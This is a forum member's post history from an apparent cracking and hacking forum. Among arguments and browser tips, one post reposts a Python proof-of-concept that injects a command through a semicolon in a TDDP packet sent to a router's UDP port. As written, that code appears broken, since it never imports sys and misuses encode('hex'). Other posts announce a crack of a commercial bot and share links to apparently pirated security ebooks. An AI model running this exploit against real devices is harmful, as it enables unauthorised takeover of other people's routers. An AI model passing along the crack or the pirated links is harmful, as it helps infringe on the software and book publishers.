Mizu

Members
  • Content Count

    97
  • Last visited

Everything posted by Mizu

  1. I'm curious to see your method ;)
  2. Source : https://mjg59.dreamwidth.org/51672.html Exploit : #!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
  3. Your sentence is just stupid :') Why is it stupid? if it's already been pre-installed on some linux OS's wouldn't that be easier for some people to use it? :kappa: It is the turn of the sentence that does not make sense; because airmon always worked mostly under linux so ... No need to take the lead for a sentence but the turn is downright strange
  4. The sentence is not clear then :p ? what is your problem? if you can't understand it just shut up please. Your sentence is just stupid :')
  5. Hello :) I decided to release my crack for the last version of ForceCop. This is the version 1.1.2. At this moment, i do not see it anywhere so only on Cracked now. Screenshots : Moved : https://crackingparadox.com/threads/forcecop-supreme-bot-1-1-4-crack-by-me.4964//
  6. Easy to post news and they do not need hide tags. The interest of them is to have recent informations in a minimum of lines to inform all. For example, CVE or interesting projects.
  7. I suggest to create a Linux sub section in Hacking to create a dedicated space to share tutorials for Linux. The aim is to provide tools, security tricks and more for Hacking / Pentesting on Linux.
  8. Here are some good ebooks from the editor Packt. All files are published on 2018 so the content is recent and always efficient. [hide] List of ebooks : ./CompTIA_Security+_Certification_Guide.pdf ./Cybersecurity_-_Attack_and_Defense_Strategies.pdf ./Cybersecurity_with_Blockchain.pdf ./Learning_Malware_Analysis.pdf ./Mastering_pfSense.pdf ./Metasploit_Penetration_Testing_Cookbook.pdf ./Network_Analysis_Using_Wireshark_Cookbook.pdf ./Penetration_Testing_on_Windows.pdf ./Practical_Cyber_Intelligence.pdf ./Practical_Mobile_Forensics.pdf ./Web_Penetration_Testing_with_Kali_Linux.pdf Read online : _ https://www.docdroid.net/81JHYq7/comptia-security-certification-guide.pdf _ https://www.docdroid.net/27YRBt6/cybersecurity-attack-and-defense-strategies.pdf _ https://www.docdroid.net/zQU4zXG/cybersecurity-with-blockchain.pdf _ https://www.docdroid.net/mWzvI24/learning-malware-analysis.pdf _ https://www.docdroid.net/HOsnbCp/mastering-pfsense.pdf _ https://www.docdroid.net/4VU97XB/metasploit-penetration-testing-cookbook.pdf _ https://www.docdroid.net/EqW95RU/network-analysis-using-wireshark-cookbook.pdf _ https://www.docdroid.net/Ci7mx4K/penetration-testing-on-windows.pdf _ https://www.docdroid.net/hKtNXBO/practical-cyber-intelligence.pdf _ https://www.docdroid.net/RzIhzHb/practical-mobile-forensics.pdf Download Link : https://mega.nz/#F!j6JVVAoZ!kUFrWUmXi41JM1kd5dMY4w [/hide]
  9. I have the same issue on my web browser. Just need to put in "temp trusted" mode "cracked.to" and "cloudfare.com" to browse cracked.to And for ReCaptcha, just "temp trusted" : "google.com" & "gstatic.com" Where could that be? I found everywhere and for a way to whitelist or trust a domain but didn't have luck. It only lets me when I'm a strict level and the website it's tracking. You must select those options in NoScript addon installed in TBB or just disable NoScript ( not recommended obviously )